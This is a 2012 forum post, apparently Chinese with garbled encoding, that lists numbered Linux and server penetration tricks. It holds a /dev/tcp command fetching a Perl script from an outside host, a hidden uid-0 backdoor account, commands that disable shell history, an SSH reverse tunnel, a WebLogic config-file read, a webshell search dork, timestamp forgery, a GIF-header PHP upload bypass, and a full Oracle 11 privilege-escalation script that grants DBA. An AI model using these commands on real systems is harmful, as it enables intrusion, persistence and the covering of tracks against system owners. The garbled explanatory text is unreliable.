admin 2012-9-5 14:54:20

linux͸

1.wget ncعʱļ
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&5 > c.pl

2.LinuxuidΪ0û
useradd -o -u 0 cnbird

3.bashȥhistory¼
export HISTSIZE=0
export HISTFILE=/dev/null

4.SSH
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p ָԶ˷SSH˿
Ȼִssh localhost-p 44

5.weblogicضȡļ©
curl -H "wl_request_type: wl_xml_entity_request" -H "xml-registryname: ../../" -H "xml-entity-path: config.xml" http://server/wl_management_internal2/wl_management

6.apache鿴webĿ¼
./httpd -t -D DUMP_VHOSTS

7.cvs͸
CVSROOT/passwd   UNIX SHA1ļ
CVSROOT/readers
CVSROOT/writers
CVS/Root   
CVS/Entries   µļĿ¼
CVS/Repository

8.Cpanel·й¶
/3rdparty/squirrelmail/functions/plugin.php

9.޸ϴļʱ(ڸֺۼ)
touch -r ļʱ ļʱ

10.baidugoogleĿwebshell
intitle:PHPJackal 1t1t

11.ܲ
ʱءĿ¼ mkdir /tmp/...
/tmp/...Ŀ¼ڹԱǡءģʱŵexpɶ

12.linuxƹgifƵͼƬ
printf "GIF89a\x01\x00\x01\x00<?php phpinfo();?>" > poc.php

13.ȡڲϢdzа
/proc/self/environ

14.µORACLE 11ûȨ(ֻҪsessionȨ)
DBMS_JVM_EXP_PERMS еIMPORT_JVM_PERMS

жϵ½Ȩ
select * from session_privs;
CREATE SESSION

select * from session_roles;

select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = 'GREMLIN(û)';

DESC JAVA$POLICY$

DECLARE
POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT' USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLE' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

connect / as sysdba
COL TYPE_NAME FOR A30;
COL NAME FOR A30;
COL_ACTION FOR A10;
SELECT TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = 'û';

connect ͨû
set serveroutput on
exec dbms_java.set_output(10000);

SELECT DBMS_JAVA.SET_OUTPUT_TO_JAVA('ID', 'oracle/aurora/rdbms/DbmsJava', 'SYS', 'writeOutputToFile', 'TEXT', NULL, NULL, NULL, NULL,0,1,1,1,1,0, 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO û''; END;', 'BEGIN NULL; END;') FROM DUAL;

EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS('NO_SUCH_SUBSCRIPTION', SYSDATE());

set role dba;

select * from session_privs;

EXEC SYS.VULNPROC('FOO"||DBMS_JAVA.SET_OUTPUT_TO_SQL("ID","DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE""GRANT DBA TO PUBLIC"";DBMS_OUTPUT.PUT_LINE(:1);END;","TEXT")||"BAR');

SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Test') FROM DUAL;
SET ROLE DBA;

15. webLogic͸
. Weblogin Script Tool(WLST)

д뵽<Domain_home>\\config\\config.xml

1.޸:
<bea_home>\wlserver_10.0\server\bin\setWLSenv.sh
2.WLST
java weblogic.WLST

wls:/offline> connect('admin', 'admin', 't3://127.0.0.1:7001')
wls:/bbk/serverConfig> help()

wls:/bbk/serverConfig> edit()
wls:/bbk/serverConfig> cd('Servers')
wls:/bbk/serverConfig/Server-cnbird> cd('Log')
wls:/bbk/serverConfig/Server-cnbird/log> cd('Server-cnbird')
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set('FileCount', '4')
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() ύӦActive Change
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect()
wls:/offline> exit()

3.:
Ϊcnbird.py
connect('admin', 'admin', 't3://127.0.0.1:7001')
cd('Servers')
cd('Log')
cd('Server-cnbird')
startEdit()
set('FileCount', '4')
save()
Ȼִjava weblogic.WLST cnbird.py
ҳ: [1]
鿴汾: linux͸